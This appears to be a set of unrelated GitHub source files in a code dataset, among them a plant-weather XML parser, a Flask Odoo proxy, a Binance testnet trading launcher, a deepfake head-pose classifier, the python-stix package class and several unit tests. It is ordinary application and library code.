float(wind_a2.find('HCLO3_MAX').text)\n\t\t\t\tfor wind_b in root.iter('BASE'):\n\t\t\t\t\t# wind_acid = wind_c.find('ACID').text\n\t\t\t\t\tfor wind_b1 in root.iter('SOAP_VAPOUR'):\n\t\t\t\t\t\twind_base_min = float(wind_b1.find('SOAP_VAPOUR_MIN').text)\n\t\t\t\t\t\twind_base_max = float(wind_b1.find('SOAP_VAPOUR_MAX').text)\n\t\t\t\tfor wind_t in root.iter('TOXIC'):\n\t\t\t\t\twind_toxic_co_min = float(wind_t.find('CO_MIN').text)\n\t\t\t\t\twind_toxic_co_high = float(wind_t.find('CO_MAX').text)\n\n\t\tfor temp in root.iter('HUMIDITY'):\n\t\t\tAH_high = float(temp.find('ABSOLUTE_HUMIDITY_TOP').text)\n\t\t\tAH_low = float(temp.find('ABSOLUTE_HUMIDITY_BOTTOM').text)\n\t\t\tRH_high = float(temp.find('RELATIVE_HUMIDITY_TOP').text)\n\t\t\tRH_low = float(temp.find('RELATIVE_HUMIDITY_BOTTOM').text)\n\n\t\tfor temp in root.iter('SOILE'):\n\t\t\tfor water_cont in root.iter('WATER_CONTENT'):\n\t\t\t\tSOIL_M_MIN = float(water_cont.find('WATER_CONTENT_MIN').text)\n\t\t\t\tSOIL_M_MAX = float(water_cont.find('WATER_CONTENT_MAX').text)\n\n\t\tfor ph in root.iter('PH'):\n\t\t\tPH_top = float(ph.find('PH_TOP').text)\n\t\t\tPH_bottom = float(ph.find('PH_BOTTOM').text)\n\n\t\tfor light in root.iter('LIGHTING'):\n\t\t\tfor intencity in root.iter('INTENCITY'):\n\t\t\t\tintencity_top = float(intencity.find('INTENCITY_TOP').text)\n\t\t\t\tintencity_bottom = float(intencity.find('INTENCITY_BOTTOM').text)\n\t\t\tfor UV in root.iter('UV_CONDITION'):\n\t\t\t\tUV_top = float(UV.find('UV_CONDITION_TOP').text)\n\t\t\t\tUV_bottom = float(UV.find('UV_CONDITION_BOTTM').text)\n\t\t\tfor IR in root.iter('IR_CONDITION'):\n\t\t\t\tIR_top = float(IR.find('IR_CONDITION_TOP').text)\n\t\t\t\tIR_bottom = float(IR.find('IR_CONDITION_BOTTOM').text)\n\n\t\t\n\t\tprint(\"############# END OF GATHERING XML DATA ##########\")\t\n\t\tprint(\"getFlowerXML_Data\")\n\t\tprint(\"____________________\")\n\t\tprint(\"temp_high\",temp_high)\n\t\tprint(\"temp_low : \",temp_low)\n\t\tprint(\"____________________\")\n\t\tprint(\"wind_high : \",wind_high)\n\t\tprint(\"wind_low : \",wind_low)\n\n\t\tprint(\"wind_nat : \",wind_nat)\n\n\t\tprint(\"wind_acid_co2_min : \",wind_acid_co2_min)\n\t\tprint(\"wind_acid_co2_high : \",wind_acid_co2_high)\n\n\t\tprint(\"wind_acid_HCLO3_min : \",wind_acid_HCLO3_min)\n\t\tprint(\"wind_acid_HCLO3_high : \",wind_acid_HCLO3_high)\n\n\t\tprint(\"wind_base_min : \",wind_base_min)\n\t\tprint(\"wind_base_max : \",wind_base_max)\n\n\t\tprint(\"wind_toxic_co_min : \",wind_toxic_co_min)\n\t\tprint(\"wind_toxic_co_high : \",wind_toxic_co_high)\n\t\tprint(\"____________________\")\n\t\tprint(\"ABSOLUTE_HUMIDITY_TOP : \", AH_high)\n\t\tprint(\"ABSOLUTE_HUMIDITY_BOTTOM : \", AH_low)\n\n\t\tprint(\"RELATIVE_HUMIDITY_TOP : \", RH_high)\n\t\tprint(\"RELATIVE_HUMIDITY_BOTTOM : \", RH_low)\n\t\tprint(\"____________________\")\n\t\tprint(\"WATER_CONTENT_MIN : \", SOIL_M_MIN)\n\t\tprint(\"WATER_CONTENT_MAX : \", SOIL_M_MAX)\n\t\tprint(\"____________________\")\n\t\tprint(\"PH_TOP : \", PH_top)\n\t\tprint(\"PH_BOTTOM : \", PH_bottom)\n\t\tprint(\"____________________\")\n\t\tprint(\"INTENCITY_TOP : \", intencity_top)\n\t\tprint(\"INTENCITY_BOTTOM : \", intencity_bottom)\n\n\t\tprint(\"UV_CONDITION_TOP : \", UV_top)\n\t\tprint(\"UV_CONDITION_BOTTOM : \", UV_bottom)\n\n\t\tprint(\"IR_CONDITION_TOP : \", IR_top)\n\t\tprint(\"IR_CONDITION_BOTTOM : \", IR_bottom)\n\t\tprint(\"____________________\")\n\n\t\tprint(\"############# END OF GATHERING XML DATA ##########\")\n\n\n\n\n# w = whetherAnalysis\n# w.__init__(25, 127,\"stormy\",100,2,5,20, 10,50, 100, 5.6, 30, 4, 6)\n\n# w.tempratureAnalysis()\n# w.windAnalysis()\n# w.humidityAnalysis()\n# w.soileMoistureAnalysis()","repo_name":"UdaraAbeyrathna/Diseases-Spreading-Simulation-Application-for-Plants","sub_path":"whetherAnalysis.py","file_name":"whetherAnalysis.py","file_ext":"py","file_size_in_byte":16350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32090237767","text":"import os\nimport logging\nfrom flask import Flask, request, jsonify, make_response, render_template\nfrom auth import check_odoo_alive, check_odoo_login\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp = Flask(__name__)\napp.config['SHOW_LOGS'] = os.getenv(\"SHOW_LOGS\")\n\nif app.config['SHOW_LOGS'] == 'True':\n proxy_log_file = os.getenv(\"PROXY_LOG_FILE\")\n logging.basicConfig(filename=proxy_log_file, level=logging.DEBUG,\n format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')\n\n\n@app.route('/')\ndef index():\n message = \"\"\n response = check_odoo_alive()\n\n if type(response) == list and '502' in response[0]:\n message += \"But, there is an error trying to connect Odoo server: [Bad Gateway - 502], \" \\\n \"check if Odoo is running and proxy configurations HOST and/or PORT are correct.\"\n\n return render_template('home.html', message=message)\n\n\n@app.route('/api/login/', methods=['POST'])\ndef login():\n \"\"\"\n Manage app login\n :return: True or False\n \"\"\"\n data = request.get_json()\n\n if data['database'] and data['username'] and data['password']:\n response = check_odoo_login(data, 'login')\n\n return make_response(jsonify({\"message\": response[0]}), response[1])\n else:\n return make_response(jsonify({\"message\": \"Unauthorized - 401\"}), 401)\n\n\n@app.route('/api/call_kw/', methods=['POST'])\ndef call_kw():\n \"\"\"\n Manage call to methods in Odoo\n :return: Response\n \"\"\"\n options = []\n\n try:\n data = request.get_json()\n\n if data['host'] and data['port'] and data['database'] and data['username'] \\\n and data['password']:\n response = check_odoo_login(data, 'call_kw')\n\n if 'options' in data:\n options = data['options']\n\n if response and data['model'] and data['method']:\n result = response.execute(data['model'], data['method'], options)\n\n return jsonify(message=\"Response success - 200\", response=result)\n\n else:\n return jsonify(message=response)\n else:\n return make_response(jsonify(message=\"Unauthorized - 401\"), 401)\n except Exception:\n return make_response(jsonify(message=\"Not Implemented - 501\"), 501)\n\n\ndef build_logs(file_url):\n \"\"\"Creates logging information\"\"\"\n number_logs_lines = int(os.getenv(\"NUMBER_LOGS_LINES\"))\n\n try:\n with open(file_url) as f:\n logs = f.readlines()[-number_logs_lines:]\n\n return logs\n except IOError:\n return ['Log file not found, check your configuration file.']\n\n\n@app.route('/proxy-logs')\ndef proxy_logs():\n \"\"\"Returns proxy logging information\"\"\"\n if app.config['SHOW_LOGS'] == 'True':\n log_file = os.getenv(\"PROXY_LOG_FILE\")\n\n return render_template('logs.html', log_type=\"Proxy\", logs_data=build_logs(log_file))\n\n return render_template('no_debug.html')\n\n\n@app.route('/odoo-logs')\ndef odoo_logs():\n \"\"\"Returns odoo logging information\"\"\"\n if app.config['SHOW_LOGS'] == 'True':\n log_file = os.getenv(\"ODOO_LOG_FILE\")\n\n return render_template('logs.html', log_type=\"Odoo\", logs_data=build_logs(log_file))\n\n return render_template('no_debug.html')\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',\n debug=True,\n port=8080)\n","repo_name":"renelhs/react-native-odoo-proxy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"31649446207","text":"import json\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport pymongo\nimport yaml\nfrom binance.client import Client\n\nfrom tensortrader.tasks.task_utils import create_logging\nfrom tensortrader.Trader.trader import BinanceTrader\n\n\ndef run(symbol):\n\n path = (\n \"/mnt/d/Tensor/tensortrader-system/\" \"tensortrader/config/trading/{}.yml\"\n ).format(symbol)\n CONF = yaml.safe_load(Path(path).read_text())\n\n print(CONF)\n\n # -----------------------------\n # Parameters\n # -----------------------------\n symbol = CONF[\"symbol\"]\n units = CONF[\"units\"]\n max_trades = CONF[\"max_trades\"]\n signal_loc = CONF[\"signal_loc\"]\n config_loc = CONF[\"config_loc\"]\n path_logs = CONF[\"path_logs\"]\n model = CONF[\"model\"]\n bar_length = CONF[\"bar_length\"]\n position = CONF[\"position\"]\n max_trade_time = CONF[\"max_trade_time\"] # minutes\n target_usdt = CONF[\"target_usdt\"] # USDT\n stop_usdt = CONF[\"stop_usdt\"] # USDT\n database_loc = CONF[\"database_loc\"]\n\n # -----------------------------\n # Logging Config\n # -----------------------------\n timestamp = datetime.now().strftime(\"%Y-%m-%d-%H-%M\")\n trading_dir = os.path.join(path_logs, f\"Trading_Execution_LOG_{symbol}\")\n\n if not os.path.exists(trading_dir):\n os.mkdir(trading_dir)\n\n print(\"Storing Price Return data at\", trading_dir)\n\n LOG_FILENAME = os.path.join(trading_dir, f\"{timestamp}_Trading_Execution.log\")\n\n print(\"Logging data at \", LOG_FILENAME)\n\n logger = create_logging(LOG_FILENAME)\n\n # -----------------------------\n # Trader\n # -----------------------------\n with open(config_loc) as f:\n SECRETS = json.load(f)\n f.close()\n\n api_key = SECRETS.get(\"key_test\")\n api_secret = SECRETS.get(\"secret_test\")\n\n try:\n binance_client = Client(\n api_key=api_key, api_secret=api_secret, tld=\"com\", testnet=True\n )\n logger.info(\"Connection to Binance Test API sucessfully created.\")\n except Exception as e:\n logger.error(f\"{e}\")\n\n try:\n MONGO_PASSWORD = SECRETS.get(\"MONGO_PASSWORD\")\n MONGO_USER = SECRETS.get(\"MONGO_USER\")\n MONGO_URL = (\n \"mongodb+srv://{}:{}@tensor-database\"\n \".rjyvv.mongodb.net/?retryWrites=true&w=majority\"\n ).format(MONGO_USER, MONGO_PASSWORD)\n\n mongo_client = pymongo.MongoClient(MONGO_URL)\n\n mongodb_database = mongo_client[\"Trading_Execution\"]\n mongodb_collection = mongodb_database[f\"{symbol}\"]\n\n logger.info(\"Connection to MONGO DB sucessfully created.\")\n except Exception as e:\n logger.error(f\"{e}\")\n\n trader = BinanceTrader(\n symbol=symbol,\n database_loc=database_loc,\n mongodb_collection=mongodb_collection,\n signal_loc=signal_loc,\n bar_length=bar_length,\n client=binance_client,\n model=model,\n units=units,\n position=position,\n max_trades=max_trades,\n max_trade_time=max_trade_time,\n target_usdt=target_usdt,\n stop_usdt=stop_usdt,\n logger=logger,\n )\n\n trader.start_trading()\n\n # trader.start_streaming()\n\n\n# if __name__ == \"__main__\":\n\n# symbol = sys.argv[1]\n# # symbol = 'BTCUSDT'\n# main(symbol)\n","repo_name":"john2408/tensortrader-system","sub_path":"tensortrader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"1241772377","text":"import unittest\nimport pandas as pd\nfrom actions import Interpolate1DAction, Interpolate2DAction\nfrom tables import Table\n\n\nclass TestInterpolationClasses(unittest.TestCase):\n \n def setUp(self):\n self.norms_data = pd.DataFrame({\n 'regressor1': [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5],\n 'regressor2': [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],\n 'type1': [0, 0.5, 1, 1.5, 1, 1.5, 2, 2.5, 2, 2.5],\n })\n self.norms = Table(self.norms_data)\n\n self.test_data = pd.DataFrame({\n 'regressor1': [1.5, 2.5, 3.5],\n 'regressor2': [3, 5, 7],\n 'data_type': ['type1', 'type1', 'type1']\n })\n self.test_table = Table(self.test_data)\n\n def test_interpolate_1d_action(self):\n action = Interpolate1DAction(\n regressor_col='regressor1',\n norms=self.norms,\n data_interpolated_col='interpolated',\n data_type_col='data_type'\n )\n\n interpolated_table = action.action(self.test_table)\n print(interpolated_table)\n interpolated_values = interpolated_table.data['interpolated'].values\n\n # Test if the interpolated values are correct\n expected_values = [15, 25, 35]\n self.assertTrue((interpolated_values == expected_values).all())\n\n def test_interpolate_2d_action(self):\n action = Interpolate2DAction(\n regressor_cols=['regressor1', 'regressor2'],\n norms=self.norms,\n data_interpolated_col='interpolated',\n data_type_col='data_type'\n )\n\n interpolated_table = action.action(self.test_table)\n print(interpolated_table)\n interpolated_values = interpolated_table.data['interpolated'].values\n\n # Test if the interpolated values are correct\n expected_values = [15, 25, 35]\n self.assertTrue((interpolated_values == expected_values).all())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bercelhegedus/management","sub_path":"unittests.py","file_name":"unittests.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25630428546","text":"from video_data import VideoData\nfrom posicao_facial import CalculadorPose\nimport numpy\nimport pickle\nimport sklearn.svm._classes\n\nnariz = list(range(28, 37))\nsobrancelha_esquerda = list(range(18, 23))\nsobrancelha_direita = list(range(23, 28))\ncantos_boca = [49, 55]\ncentro_rosto = nariz + sobrancelha_esquerda + sobrancelha_direita + cantos_boca\nface_inteira = list(range(1, 18)) + centro_rosto\n\ndef classifica_faces(video_data: VideoData, caminho_classificador=\"../dataset/deepfake-detection-challenge/train_sample_videos/modelo_SVM.pkl\"):\n pose_estimator = CalculadorPose((video_data.largura, video_data.altura))\n\n with open(caminho_classificador, 'rb') as f:\n model = pickle.load(f, fix_imports=True)\n classifier = model[0]\n scaler = model[1]\n probabilidades = list()\n for face in video_data.pontos_faciais:\n for frame in face:\n probabilidade = examine_a_face(frame, classifier, scaler, pose_estimator)\n probabilidades.append(probabilidade)\n return sum(probabilidades)/len(probabilidades)\n\ndef examine_a_face(landmarks, classifier, scaler, pose_estimator: CalculadorPose):\n # extract head pose\n R_c, t_c = None, None\n R_a, t_a = None, None\n R_c_matrix, R_a_matrix = None, None\n\n R_c, t_c = pose_estimator.solve_single_pose(landmarks, centro_rosto)\n R_a, t_a = pose_estimator.solve_single_pose(landmarks, face_inteira)\n R_c_matrix = pose_estimator.Rodrigues_convert(R_c)\n R_a_matrix = pose_estimator.Rodrigues_convert(R_a)\n\n rotation_matrix_feature = (R_c_matrix - R_a_matrix).flatten()\n translation_vector_feature = (t_c - t_a)[:, -1]\n feature = numpy.concatenate([rotation_matrix_feature, translation_vector_feature]).reshape(1, -1)\n scaled_feature = scaler.transform(feature)\n score = classifier.predict_proba(scaled_feature)\n\n return score[0][-1]\n","repo_name":"orvergon/detector_ensemble_deepfake","sub_path":"classificador_pos_facial_svm.py","file_name":"classificador_pos_facial_svm.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"13515470259","text":"from mixbox import idgen\nfrom mixbox import fields\n\n# cybox\nfrom cybox.core import Observable, Observables\n\n# base\nimport stix\n\n# utility imports\nfrom .. import utils\nfrom ..utils import parser\nfrom ..utils import deprecated\n\n# component imports\nfrom ..campaign import Campaign\nfrom ..coa import CourseOfAction\nfrom ..exploit_target import ExploitTarget\nfrom ..indicator import Indicator\nfrom ..incident import Incident\nfrom ..threat_actor import ThreatActor\nfrom ..ttp import TTP\nfrom ..report import Report\n\n# relationship imports\nfrom ..common.related import RelatedPackages\n\n# relative imports\nfrom .stix_header import STIXHeader\nfrom .ttps import TTPs\nfrom . import (Campaigns, CoursesOfAction, ExploitTargets, Incidents,\n Indicators, ThreatActors, Reports)\n\n# binding imports\nimport stix.bindings.stix_core as stix_core_binding\nimport mixbox.entities\n\nclass STIXPackage(stix.Entity):\n \"\"\"A STIX Package object.\n\n Args:\n id_ (optional): An identifier. If ``None``, a value will be generated\n via ``mixbox.idgen.create_id()``. If set, this will unset the\n ``idref`` property.\n idref: **DEPRECATED** An identifier reference. If set this will unset\n the ``id_`` property.\n timestamp: **DEPRECATED** A timestamp value. Can be an instance of\n ``datetime.datetime`` or ``str``.\n header: A Report :class:`.Header` object.\n campaigns: A collection of :class:`.Campaign` objects.\n course_of_action: A collection of :class:`.CourseOfAction` objects.\n exploit_targets: A collection of :class:`.ExploitTarget` objects.\n incidents: A collection of :class:`.Incident` objects.\n indicators: A collection of :class:`.Indicator` objects.\n threat_actors: A collection of :class:`.ThreatActor` objects.\n ttps: A collection of :class:`.TTP` objects.\n related_packages: **DEPRECATED**. A collection of\n :class:`.RelatedPackage` objects.\n reports: A collection of :class:`.Report` objects.\n\n \"\"\"\n _binding = stix_core_binding\n _binding_class = _binding.STIXType\n _namespace = 'http://stix.mitre.org/stix-1'\n _version = \"1.2\"\n _ALL_VERSIONS = (\"1.0\", \"1.0.1\", \"1.1\", \"1.1.1\", \"1.2\")\n\n id_ = fields.IdField(\"id\")\n idref = fields.IdrefField(\"idref\", preset_hook=deprecated.field)\n version = fields.TypedField(\"version\")\n timestamp = fields.DateTimeField(\"timestamp\", preset_hook=deprecated.field)\n stix_header = fields.TypedField(\"STIX_Header\", STIXHeader)\n campaigns = fields.TypedField(\"Campaigns\", Campaigns)\n courses_of_action = fields.TypedField(\"Courses_Of_Action\", CoursesOfAction)\n exploit_targets = fields.TypedField(\"Exploit_Targets\", ExploitTargets)\n observables = fields.TypedField(\"Observables\", Observables)\n indicators = fields.TypedField(\"Indicators\", Indicators)\n incidents = fields.TypedField(\"Incidents\", Incidents)\n threat_actors = fields.TypedField(\"Threat_Actors\", ThreatActors)\n ttps = fields.TypedField(\"TTPs\", TTPs)\n related_packages = fields.TypedField(\"Related_Packages\", RelatedPackages)\n reports = fields.TypedField(\"Reports\", Reports)\n\n def __init__(self, id_=None, idref=None, timestamp=None, stix_header=None,\n courses_of_action=None, exploit_targets=None, indicators=None,\n observables=None, incidents=None, threat_actors=None,\n ttps=None, campaigns=None, related_packages=None,\n reports=None):\n \n super(STIXPackage, self).__init__()\n \n self.id_ = id_ or idgen.create_id(\"Package\")\n self.idref = idref\n self.version = STIXPackage._version\n self.stix_header = stix_header\n self.campaigns = campaigns or Campaigns()\n self.courses_of_action = courses_of_action or CoursesOfAction()\n self.exploit_targets = exploit_targets or ExploitTargets()\n self.observables = observables or Observables()\n self.indicators = indicators or Indicators()\n self.incidents = incidents or Incidents()\n self.threat_actors = threat_actors or ThreatActors()\n self.ttps = ttps\n self.related_packages = related_packages\n self.reports = reports or Reports()\n self.timestamp = timestamp\n\n def add_indicator(self, indicator):\n \"\"\"Adds an :class:`.Indicator` object to the :attr:`indicators`\n collection.\n\n \"\"\"\n if self.indicators is None:\n self.indicators = Indicators()\n self.indicators.append(indicator)\n\n def add_campaign(self, campaign):\n \"\"\"Adds a :class:`Campaign` object to the :attr:`campaigns` collection.\n\n \"\"\"\n if self.campaigns is None:\n self.campaigns = Campaigns()\n self.campaigns.append(campaign)\n\n def add_observable(self, observable):\n \"\"\"Adds an ``Observable`` object to the :attr:`observables` collection.\n\n If `observable` is not an ``Observable`` instance, an effort will be\n made to convert it to one.\n\n \"\"\"\n if not self.observables:\n self.observables = Observables(observables=observable)\n else:\n self.observables.add(observable)\n\n def add_incident(self, incident):\n \"\"\"Adds an :class:`.Incident` object to the :attr:`incidents`\n collection.\n\n \"\"\"\n if self.incidents is None:\n self.incidents = Incidents()\n self.incidents.append(incident)\n\n def add_threat_actor(self, threat_actor):\n \"\"\"Adds an :class:`.ThreatActor` object to the :attr:`threat_actors`\n collection.\n\n \"\"\"\n if self.threat_actors is None:\n self.threat_actors = ThreatActors()\n self.threat_actors.append(threat_actor)\n\n def add_course_of_action(self, course_of_action):\n \"\"\"Adds an :class:`.CourseOfAction` object to the\n :attr:`courses_of_action` collection.\n\n \"\"\"\n if self.courses_of_action is None:\n self.courses_of_action = CoursesOfAction()\n self.courses_of_action.append(course_of_action)\n\n def add_exploit_target(self, exploit_target):\n \"\"\"Adds an :class:`.ExploitTarget` object to the\n :attr:`exploit_targets` collection.\n\n \"\"\"\n if self.exploit_targets is None:\n self.exploit_targets = ExploitTargets()\n self.exploit_targets.append(exploit_target)\n\n def add_ttp(self, ttp):\n \"\"\"Adds an :class:`.TTP` object to the :attr:`ttps` collection.\n\n \"\"\"\n if self.ttps is None:\n self.ttps = TTPs()\n self.ttps.ttp.append(ttp)\n\n def add_report(self, report):\n \"\"\"Adds a :class:`.Report` object to the :attr:`reports` collection.\n\n \"\"\"\n if self.reports is None:\n self.reports = Reports()\n self.reports.append(report)\n\n def add_related_package(self, related_package):\n \"\"\"Adds a :class:`.RelatedPackage` object to the\n :attr:`related_packages` collection.\n\n \"\"\"\n if self.related_packages is None:\n self.related_packages = RelatedPackages()\n self.related_packages.append(related_package)\n\n def add(self, entity):\n \"\"\"Adds `entity` to a top-level collection. For example, if `entity` is\n an Indicator object, the `entity` will be added to the ``indicators``\n top-level collection.\n\n \"\"\"\n if utils.is_cybox(entity):\n self.add_observable(entity)\n return\n\n tlo_adds = {\n Campaign: self.add_campaign,\n CourseOfAction: self.add_course_of_action,\n ExploitTarget: self.add_exploit_target,\n Incident: self.add_incident,\n Indicator: self.add_indicator,\n ThreatActor: self.add_threat_actor,\n TTP: self.add_ttp,\n Report: self.add_report,\n Observable: self.add_observable,\n }\n\n try:\n add = tlo_adds[entity.__class__]\n add(entity)\n except KeyError:\n error = \"Cannot add type '{0}' to a top-level collection\"\n error = error.format(type(entity))\n raise TypeError(error)\n\n @classmethod\n def from_xml(cls, xml_file, encoding=None):\n \"\"\"Parses the `xml_file` file-like object and returns a\n :class:`STIXPackage` instance.\n\n Args:\n xml_file: A file, file-like object, etree._Element, or\n etree._ElementTree instance.\n encoding: The character encoding of the `xml_file` input. If\n ``None``, an attempt will be made to determine the input\n character encoding. Default is ``None``.\n\n Returns:\n An instance of :class:`STIXPackage`.\n\n \"\"\"\n entity_parser = parser.EntityParser()\n return entity_parser.parse_xml(xml_file, encoding=encoding)\n","repo_name":"STIXProject/python-stix","sub_path":"stix/core/stix_package.py","file_name":"stix_package.py","file_ext":"py","file_size_in_byte":8859,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"44"} +{"seq_id":"42908411528","text":"import sys\nimport numpy as np\nimport pytest\n\nfrom mspasspy.ccore.seismic import Seismogram\n\nsys.path.append(\"python/tests\")\nsys.path.append(\"python/mspasspy/util/\")\nimport logging_helper\nfrom helper import (\n get_live_seismogram,\n get_live_timeseries,\n get_live_timeseries_ensemble,\n get_live_seismogram_ensemble,\n)\n\n\ndef test_info_new_map():\n # Seismogram and TimeSeries\n seis = get_live_seismogram()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n assert seis.number_of_stages() == 1\n\n ts = get_live_timeseries()\n assert ts.number_of_stages() == 0\n logging_helper.info(ts, \"1\", \"dummy_func\")\n assert ts.number_of_stages() == 1\n\n # ensemble\n seis_e = get_live_seismogram_ensemble(3)\n logging_helper.info(seis_e, \"0\", \"dummy_func\")\n for i in range(3):\n assert seis_e.member[i].number_of_stages() == 1\n\n seis_e = get_live_seismogram_ensemble(3)\n logging_helper.info(seis_e, \"0\", \"dummy_func\", 0)\n assert seis_e.member[0].number_of_stages() == 1\n\n tse = get_live_timeseries_ensemble(3)\n logging_helper.info(tse, \"0\", \"dummy_func\", 0)\n assert tse.member[0].number_of_stages() == 1\n\n\ndef test_info_not_live():\n # Seismogram and TimeSeries\n seis = get_live_seismogram()\n seis.kill()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n assert seis.number_of_stages() == 0\n\n # ensemble\n seis_e = get_live_seismogram_ensemble(3)\n assert seis_e.member[0].number_of_stages() == 0\n seis_e.member[0].kill()\n logging_helper.info(seis_e, \"0\", \"dummy_func\", 0)\n assert seis_e.member[0].number_of_stages() == 0\n\n\ndef test_info_out_of_bound():\n seis_e = get_live_seismogram_ensemble(3)\n with pytest.raises(IndexError) as err:\n logging_helper.info(seis_e, \"0\", \"dummy_func\", 3)\n assert seis_e.member[0].number_of_stages() == 0\n\n\ndef test_info_empty():\n # Seismogram and TimeSeries\n seis = Seismogram()\n seis.set_live()\n assert len(seis.elog.get_error_log()) == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n assert len(seis.elog.get_error_log()) == 1\n\n\ndef test_reduce_functionality():\n # Seismogram and TimeSeries\n seis = get_live_seismogram()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n logging_helper.info(seis, \"2\", \"dummy_func_2\")\n assert seis.number_of_stages() == 2\n seis2 = get_live_seismogram()\n assert seis2.number_of_stages() == 0\n logging_helper.reduce(seis2, seis, \"3\", \"reduce\")\n assert len(seis2.get_nodes()) == 3\n\n ts = get_live_timeseries()\n ts2 = get_live_timeseries()\n assert ts.number_of_stages() == 0\n logging_helper.info(ts, \"1\", \"dummy_func\")\n logging_helper.info(ts, \"2\", \"dummy_func\")\n assert ts.number_of_stages() == 2\n logging_helper.reduce(ts2, ts, \"3\", \"reduce\")\n assert len(ts2.get_nodes()) == 3\n\n # ensemble\n seis_e = get_live_seismogram_ensemble(3)\n seis_e2 = get_live_seismogram_ensemble(3)\n logging_helper.info(seis_e, \"0\", \"dummy_func\")\n logging_helper.info(seis_e, \"1\", \"dummy_func\")\n logging_helper.info(seis_e, \"2\", \"dummy_func\")\n logging_helper.reduce(seis_e2, seis_e, \"3\", \"reduce\")\n for i in range(3):\n assert len(seis_e2.member[i].get_nodes()) == 4\n\n tse = get_live_timeseries_ensemble(3)\n tse2 = get_live_timeseries_ensemble(3)\n logging_helper.info(tse, \"0\", \"dummy_func\")\n logging_helper.info(tse, \"1\", \"dummy_func\")\n logging_helper.info(tse, \"2\", \"dummy_func\")\n logging_helper.reduce(tse2, tse, \"3\", \"reduce\")\n for i in range(3):\n assert len(tse2.member[i].get_nodes()) == 4\n\n\ndef test_reduce_error():\n tse = get_live_timeseries_ensemble(3)\n tse2 = get_live_timeseries_ensemble(2)\n with pytest.raises(IndexError) as err:\n logging_helper.reduce(tse, tse2, \"0\", \"dummy_func\")\n assert (\n str(err.value)\n == \"logging_helper.reduce: data1 and data2 have different sizes of member\"\n )\n\n tse3 = get_live_timeseries_ensemble(3)\n ts = get_live_timeseries()\n with pytest.raises(TypeError) as ex:\n logging_helper.reduce(ts, tse3, \"0\", \"dummy_func\")\n assert str(ex.value) == \"logging_helper.reduce: data2 has a different type as data1\"\n\n\ndef test_reduce_dead_silent():\n seis = get_live_seismogram()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n logging_helper.info(seis, \"2\", \"dummy_func_2\")\n assert seis.number_of_stages() == 2\n seis.kill()\n seis2 = get_live_seismogram()\n assert seis2.number_of_stages() == 0\n logging_helper.reduce(seis2, seis, \"3\", \"reduce\")\n assert len(seis2.get_nodes()) == 3\n\n seis = get_live_seismogram()\n seis2 = get_live_seismogram()\n logging_helper.info(seis, \"1\", \"dummy_func\")\n logging_helper.info(seis, \"2\", \"dummy_func_2\")\n seis2.kill()\n logging_helper.reduce(seis2, seis, \"3\", \"reduce\")\n assert len(seis2.get_nodes()) == 0\n\n\nif __name__ == \"__main__\":\n test_reduce_functionality()\n","repo_name":"mspass-team/mspass","sub_path":"python/tests/util/test_logging_helper.py","file_name":"test_logging_helper.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"44"} +{"seq_id":"20078177181","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 21:28:58 2019\n\n@author: ankusmanish\n\"\"\"\n\ndata = [{'id': 1, 'success': True, 'name': 'Lary'},\n {'id': 2, 'success': False, 'name': 'Rabi'},\n {'id': 3, 'success': True, 'name': 'Alex'}]\n\na = 0\n#loop that counts the 'true' value\nfor i in range(len(data)):\n if data[i]['success'] == True:\n a = a + 1\n\nprint('The count of true value is : {}'.format(a)) \n","repo_name":"AnkusManish/Machine-Learning","sub_path":"Week2/Dictionary/Program_10.py","file_name":"Program_10.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42346134458","text":"import pytest as pytest\nfrom httpx import AsyncClient\n\nfrom core.settings import settings\n\n\n@pytest.mark.asyncio\nasync def test_get_user_contributions(client: AsyncClient):\n r = await client.post(f\"{settings.API_V1_STR}/contributions\",\n json={'user': \"Jimbo Wales\"})\n assert r.status_code == 200\n\n\n@pytest.mark.asyncio\nasync def test_get_user_contributions_over_time(client: AsyncClient):\n r = await client.post(f\"{settings.API_V1_STR}/contributions/stats_over_time\",\n json={'user': \"Jimbo Wales\", \"interval\": 86400})\n assert r.status_code == 200\n","repo_name":"SH659/WikiAnalyzer","sub_path":"app/tests/api/api_v1/test_contributions.py","file_name":"test_contributions.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26694996225","text":"file1 = open(\"./logs/pythonlog.txt\", 'r+')\navg1 = 0.0\nlines1 = 0.0\nfor line in file1:\n lines1 = lines1 + 1.0\n avg1 = (avg1 + float(line))\navg1 = avg1/lines1\nprint(avg1, \"for Python with\", lines1, \"lines\")\n\n\nfile2 = 